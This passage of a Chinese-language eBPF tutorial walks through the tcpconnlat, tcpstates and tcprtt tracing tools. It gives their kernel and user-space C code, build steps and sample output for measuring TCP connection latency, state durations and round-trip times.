event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
|
||
} else {
|
||
BPF_CORE_READ_INTO(&event.saddr_v6, sk,
|
||
__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
BPF_CORE_READ_INTO(&event.daddr_v6, sk,
|
||
__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
|
||
&event, sizeof(event));
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &sk);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用<code>tcp_v4_connect</code>或<code>tcp_v6_connect</code>函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过<code>tcp_rcv_state_process</code>函数来处理。eBPF程序通过在这些关键函数上设置kprobe(或fentry),可以在关键时刻得到通知并执行相应的处理代码。</p>
|
||
<p>一些关键概念说明:</p>
|
||
<ul>
|
||
<li>kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。</li>
|
||
<li>map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。</li>
|
||
<li>socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的<code>struct sock</code>结构就是对socket的实现。</li>
|
||
</ul>
|
||
<h3 id="用户态数据处理"><a class="header" href="#用户态数据处理">用户态数据处理</a></h3>
|
||
<p>用户态数据处理是使用<code>perf_buffer__poll</code>来接收并处理从内核发送到用户态的eBPF事件。<code>perf_buffer__poll</code>是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。</p>
|
||
<p>首先,让我们详细看一下主轮询循环:</p>
|
||
<pre><code class="language-c"> /* main: poll */
|
||
while (!exiting) {
|
||
err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
|
||
if (err < 0 && err != -EINTR) {
|
||
fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err));
|
||
goto cleanup;
|
||
}
|
||
/* reset err to return 0 if exiting */
|
||
err = 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(且错误不是由信号中断引起的<code>-EINTR</code>),会打印出错误消息并跳转到清理流程;被信号中断的情况则会被忽略。这个轮询过程会一直持续,直到退出标志<code>exiting</code>被设置。</p>
|
||
<p>接下来,让我们来看看<code>handle_event</code>函数,这个函数将处理从内核发送到用户态的每一个eBPF事件:</p>
|
||
<pre><code class="language-c">void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
|
||
const struct event* e = data;
|
||
char src[INET6_ADDRSTRLEN];
|
||
char dst[INET6_ADDRSTRLEN];
|
||
union {
|
||
struct in_addr x4;
|
||
struct in6_addr x6;
|
||
} s, d;
|
||
static __u64 start_ts;
|
||
|
||
if (env.timestamp) {
|
||
if (start_ts == 0)
|
||
start_ts = e->ts_us;
|
||
printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0);
|
||
}
|
||
if (e->af == AF_INET) {
|
||
s.x4.s_addr = e->saddr_v4;
|
||
d.x4.s_addr = e->daddr_v4;
|
||
} else if (e->af == AF_INET6) {
|
||
memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr));
|
||
memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr));
|
||
} else {
|
||
fprintf(stderr, "broken event: event->af=%d", e->af);
|
||
return;
|
||
}
|
||
|
||
if (env.lport) {
|
||
printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid,
|
||
e->comm, e->af == AF_INET ? 4 : 6,
|
||
inet_ntop(e->af, &s, src, sizeof(src)), e->lport,
|
||
inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
|
||
e->delta_us / 1000.0);
|
||
} else {
|
||
printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm,
|
||
e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)),
|
||
inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
|
||
e->delta_us / 1000.0);
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p><code>handle_event</code>函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个<code>event</code>结构体,包含了之前在内核态计算得到的TCP连接的信息。</p>
|
||
<p>首先,如果用户启用了时间戳选项,它会以收到的第一个事件的时间戳作为起始时间,计算出当前事件的相对时间(单位为秒)并打印出来。接着,根据地址族(IPv4或IPv6),将源地址和目标地址复制到对应的地址结构中,以便之后通过<code>inet_ntop</code>转换为可读的字符串;如果地址族无法识别,则打印错误信息并直接返回。</p>
|
||
<p>最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。</p>
|
||
<h2 id="编译运行-2"><a class="header" href="#编译运行-2">编译运行</a></h2>
|
||
<pre><code class="language-console">$ make
|
||
...
|
||
BPF .output/tcpconnlat.bpf.o
|
||
GEN-SKEL .output/tcpconnlat.skel.h
|
||
CC .output/tcpconnlat.o
|
||
BINARY tcpconnlat
|
||
$ sudo ./tcpconnlat
|
||
PID COMM IP SADDR DADDR DPORT LAT(ms)
|
||
222564 wget 4 192.168.88.15 110.242.68.3 80 25.29
|
||
222684 wget 4 192.168.88.15 167.179.101.42 443 246.76
|
||
222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17
|
||
222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31
|
||
</code></pre>
|
||
<p>源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat</a></p>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c">tcpconnlat</a></li>
|
||
</ul>
|
||
<h2 id="总结-11"><a class="header" href="#总结-11">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。</p>
|
||
<p>我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。</p>
|
||
<p>在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,例如如何使用 eBPF 来追踪网络包的传输路径,如何利用 eBPF 对系统的性能进行细粒度的监控等等。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf入门实践教程十四记录-tcp-连接状态与-tcp-rtt"><a class="header" href="#ebpf入门实践教程十四记录-tcp-连接状态与-tcp-rtt">eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:<code>tcpstates</code> 和 <code>tcprtt</code>。<code>tcpstates</code> 用于记录 TCP 连接的状态变化,而 <code>tcprtt</code> 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。</p>
|
||
<h2 id="tcprtt-与-tcpstates"><a class="header" href="#tcprtt-与-tcpstates"><code>tcprtt</code> 与 <code>tcpstates</code></a></h2>
|
||
<p>网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 <code>tcprtt</code> 这个工具。<code>tcprtt</code> 可以监控 TCP 连接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。</p>
|
||
<p>当 TCP 连接建立时,<code>tcprtt</code> 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,<code>tcprtt</code> 会收集 TCP 连接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,<code>tcprtt</code> 会通过用户态代码,将收集的信息以图形化的方式展示给用户。</p>
|
||
<p><code>tcpstates</code> 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,<code>tcpstates</code> 可以打印出类似以下的输出:</p>
|
||
<pre><code class="language-sh">SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS
|
||
ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000
|
||
ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373
|
||
ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042
|
||
ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536
|
||
ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006
|
||
</code></pre>
|
||
<p>以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。</p>
|
||
<p>在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。</p>
|
||
<h2 id="tcpstate"><a class="header" href="#tcpstate">tcpstates</a></h2>
|
||
<p>由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstates 的 eBPF 代码:</p>
|
||
<pre><code class="language-c">const volatile bool filter_by_sport = false;
|
||
const volatile bool filter_by_dport = false;
|
||
const volatile short target_family = 0;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u16);
|
||
__type(value, __u16);
|
||
} sports SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u16);
|
||
__type(value, __u16);
|
||
} dports SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, struct sock *);
|
||
__type(value, __u64);
|
||
} timestamps SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(__u32));
|
||
__uint(value_size, sizeof(__u32));
|
||
} events SEC(".maps");
|
||
|
||
SEC("tracepoint/sock/inet_sock_set_state")
|
||
int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
|
||
{
|
||
struct sock *sk = (struct sock *)ctx->skaddr;
|
||
__u16 family = ctx->family;
|
||
__u16 sport = ctx->sport;
|
||
__u16 dport = ctx->dport;
|
||
__u64 *tsp, delta_us, ts;
|
||
struct event event = {};
|
||
|
||
if (ctx->protocol != IPPROTO_TCP)
|
||
return 0;
|
||
|
||
if (target_family && target_family != family)
|
||
return 0;
|
||
|
||
if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport))
|
||
return 0;
|
||
|
||
if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport))
|
||
return 0;
|
||
|
||
tsp = bpf_map_lookup_elem(&timestamps, &sk);
|
||
ts = bpf_ktime_get_ns();
|
||
if (!tsp)
|
||
delta_us = 0;
|
||
else
|
||
delta_us = (ts - *tsp) / 1000;
|
||
|
||
event.skaddr = (__u64)sk;
|
||
event.ts_us = ts / 1000;
|
||
event.delta_us = delta_us;
|
||
event.pid = bpf_get_current_pid_tgid() >> 32;
|
||
event.oldstate = ctx->oldstate;
|
||
event.newstate = ctx->newstate;
|
||
event.family = family;
|
||
event.sport = sport;
|
||
event.dport = dport;
|
||
bpf_get_current_comm(&event.task, sizeof(event.task));
|
||
|
||
if (family == AF_INET) {
|
||
bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr);
|
||
bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr);
|
||
} else { /* family == AF_INET6 */
|
||
bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
|
||
|
||
if (ctx->newstate == TCP_CLOSE)
|
||
bpf_map_delete_elem(&timestamps, &sk);
|
||
else
|
||
bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p><code>tcpstates</code>主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。</p>
|
||
<h3 id="定义-bpf-maps"><a class="header" href="#定义-bpf-maps">定义 BPF Maps</a></h3>
|
||
<p>在<code>tcpstates</code>程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。<code>sports</code>和<code>dports</code>分别用于存储源端口和目标端口,用于过滤 TCP 连接;<code>timestamps</code>用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;<code>events</code>则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。</p>
|
||
<h3 id="追踪-tcp-连接状态变化"><a class="header" href="#追踪-tcp-连接状态变化">追踪 TCP 连接状态变化</a></h3>
|
||
<p>程序定义了一个名为<code>handle_set_state</code>的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到<code>sock/inet_sock_set_state</code>这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行<code>handle_set_state</code>函数。</p>
|
||
<p>在<code>handle_set_state</code>函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从<code>timestamps</code>map 中获取当前连接的上一个时间戳,并据此计算出连接在上一个状态(旧状态)中停留的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过<code>bpf_perf_event_output</code>函数将该 event 发送到用户态。</p>
|
||
<h3 id="更新时间戳"><a class="header" href="#更新时间戳">更新时间戳</a></h3>
|
||
<p>最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从<code>timestamps</code>map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。</p>
|
||
<p>用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据:</p>
|
||
<pre><code class="language-c">static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
|
||
char ts[32], saddr[26], daddr[26];
|
||
struct event* e = data;
|
||
struct tm* tm;
|
||
int family;
|
||
time_t t;
|
||
|
||
if (emit_timestamp) {
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
printf("%8s ", ts);
|
||
}
|
||
|
||
inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr));
|
||
inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr));
|
||
if (wide_output) {
|
||
family = e->family == AF_INET ? 4 : 6;
|
||
printf(
|
||
"%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s "
|
||
"%.3f\n",
|
||
e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr,
|
||
e->dport, tcp_states[e->oldstate], tcp_states[e->newstate],
|
||
(double)e->delta_us / 1000);
|
||
} else {
|
||
printf(
|
||
"%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n",
|
||
e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport,
|
||
tcp_states[e->oldstate], tcp_states[e->newstate],
|
||
(double)e->delta_us / 1000);
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p><code>handle_event</code>就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。</p>
|
||
<p>在<code>handle_event</code>函数中,我们首先通过<code>inet_ntop</code>函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。</p>
|
||
<p>这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。</p>
|
||
<p>总结起来,用户态部分的处理主要涉及到了以下几个步骤:</p>
|
||
<ol>
|
||
<li>使用 libbpf 加载并运行 eBPF 程序。</li>
|
||
<li>设置回调函数来接收内核发送的事件。</li>
|
||
<li>处理接收到的事件,将其转换成人类可读的格式并打印。</li>
|
||
</ol>
|
||
<p>以上就是<code>tcpstates</code>程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。</p>
|
||
<h3 id="tcprtt"><a class="header" href="#tcprtt">tcprtt</a></h3>
|
||
<p>在本章节中,我们将分析<code>tcprtt</code> eBPF 程序的内核态代码。<code>tcprtt</code>是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。</p>
|
||
<pre><code class="language-c">
|
||
/// @sample {"interval": 1000, "type" : "log2_hist"}
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u64);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
SEC("fentry/tcp_rcv_established")
|
||
int BPF_PROG(tcp_rcv, struct sock *sk)
|
||
{
|
||
const struct inet_sock *inet = (struct inet_sock *)(sk);
|
||
struct tcp_sock *ts;
|
||
struct hist *histp;
|
||
u64 key, slot;
|
||
u32 srtt;
|
||
|
||
if (targ_sport && targ_sport != inet->inet_sport)
|
||
return 0;
|
||
if (targ_dport && targ_dport != sk->__sk_common.skc_dport)
|
||
return 0;
|
||
if (targ_saddr && targ_saddr != inet->inet_saddr)
|
||
return 0;
|
||
if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr)
|
||
return 0;
|
||
|
||
if (targ_laddr_hist)
|
||
key = inet->inet_saddr;
|
||
else if (targ_raddr_hist)
|
||
key = inet->sk.__sk_common.skc_daddr;
|
||
else
|
||
key = 0;
|
||
histp = bpf_map_lookup_or_try_init(&hists, &key, &zero);
|
||
if (!histp)
|
||
return 0;
|
||
ts = (struct tcp_sock *)(sk);
|
||
srtt = BPF_CORE_READ(ts, srtt_us) >> 3;
|
||
if (targ_ms)
|
||
srtt /= 1000U;
|
||
slot = log2l(srtt);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
__sync_fetch_and_add(&histp->slots[slot], 1);
|
||
if (targ_show_ext) {
|
||
__sync_fetch_and_add(&histp->latency, srtt);
|
||
__sync_fetch_and_add(&histp->cnt, 1);
|
||
}
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>首先,我们定义了一个 hash 类型的 eBPF map,名为<code>hists</code>,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个<code>hist</code>结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。</p>
|
||
<p>接着,我们定义了一个 eBPF 程序,名为<code>tcp_rcv</code>,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在<code>hists</code> map 中查找或者初始化对应的 histogram。</p>
|
||
<p>接下来,我们读取 TCP 连接的<code>srtt_us</code>字段。这个字段保存的是平滑 RTT 值左移 3 位(即乘以 8)之后的结果,单位是微秒,因此代码中需要先右移 3 位还原出真实的平滑 RTT;如果设置了<code>targ_ms</code>,还会进一步换算为毫秒。然后我们对这个 RTT 值取以 2 为底的对数,得到对应的 slot 下标,并将 histogram 中该 slot 的计数加一。</p>
|
||
<p>如果设置了<code>show_ext</code>参数,我们还会将 RTT 值和计数器累加到 histogram 的<code>latency</code>和<code>cnt</code>字段中。</p>
|
||
<p>通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。</p>
|
||
<p>总结起来,<code>tcprtt</code> eBPF 程序的主要逻辑包括以下几个步骤:</p>
|
||
<ol>
|
||
<li>根据过滤条件对 TCP 连接进行过滤。</li>
|
||
<li>在<code>hists</code> map 中查找或者初始化对应的 histogram。</li>
|
||
<li>读取 TCP 连接的<code>srtt_us</code>字段,并将其转换为对数形式,存储到 histogram 中。</li>
|
||
<li>如果设置了<code>show_ext</code>参数,将 RTT 值和计数器累加到 histogram 的<code>latency</code>和<code>cnt</code>字段中。</li>
|
||
</ol>
|
||
<p>tcprtt 挂载到了内核态的 tcp_rcv_established 函数上:</p>
|
||
<pre><code class="language-c">void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
|
||
</code></pre>
|
||
<p>这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于<code>ESTABLISHED</code>状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用:</p>
|
||
<ul>
|
||
<li>我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。</li>
|
||
<li>收到了乱序的数据包。</li>
|
||
<li>期待接收紧急数据。</li>
|
||
<li>没有剩余的缓冲区空间。</li>
|
||
<li>接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。</li>
|
||
<li>数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。</li>
|
||
<li>接收到了意外的TCP选项。</li>
|
||
</ul>
|
||
<p>当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在<code>tcp_data_queue</code>函数中被开启。</p>
|
||
<h2 id="编译运行-3"><a class="header" href="#编译运行-3">编译运行</a></h2>
|
||
<p>对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用:</p>
|
||
<pre><code class="language-console">$ make
|
||
...
|
||
BPF .output/tcpstates.bpf.o
|
||
GEN-SKEL .output/tcpstates.skel.h
|
||
CC .output/tcpstates.o
|
||
BINARY tcpstates
|
||
$ sudo ./tcpstates
|
||
SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000
|
||
ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794
|
||
ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086
|
||
ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193
|
||
ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000
|
||
ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763
|
||
ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000
|
||
</code></pre>
|
||
<p>对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子:</p>
|
||
<p>编译:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc tcprtt.bpf.c tcprtt.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>运行:</p>
|
||
<pre><code class="language-console">$ sudo ecli run package.json -h
|
||
A simple eBPF program
|
||
|
||
|
||
Usage: package.json [OPTIONS]
|
||
|
||
Options:
|
||
--verbose Whether to show libbpf debug information
|
||
--targ_laddr_hist Set value of `bool` variable targ_laddr_hist
|
||
--targ_raddr_hist Set value of `bool` variable targ_raddr_hist
|
||
--targ_show_ext Set value of `bool` variable targ_show_ext
|
||
--targ_sport <targ_sport> Set value of `__u16` variable targ_sport
|
||
--targ_dport <targ_dport> Set value of `__u16` variable targ_dport
|
||
--targ_saddr <targ_saddr> Set value of `__u32` variable targ_saddr
|
||
--targ_daddr <targ_daddr> Set value of `__u32` variable targ_daddr
|
||
--targ_ms Set value of `bool` variable targ_ms
|
||
-h, --help Print help
|
||
-V, --version Print version
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
|
||
$ sudo ecli run package.json
|
||
key = 0
|
||
latency = 0
|
||
cnt = 0
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 0 | |
|
||
512 -> 1023 : 4 |******************** |
|
||
1024 -> 2047 : 1 |***** |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 8 |****************************************|
|
||
|
||
key = 0
|
||
latency = 0
|
||
cnt = 0
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 0 | |
|
||
512 -> 1023 : 11 |*************************** |
|
||
1024 -> 2047 : 1 |** |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 16 |****************************************|
|
||
8192 -> 16383 : 4 |********** |
|
||
</code></pre>
|
||
<p>完整源代码:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/14-tcpstates">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/14-tcpstates</a></li>
|
||
</ul>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt">tcpstates</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py">tcprtt</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpstates.bpf.c">libbpf-tools/tcpstates</a></li>
|
||
</ul>
|
||
<h2 id="总结-12"><a class="header" href="#总结-12">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。</p>
|
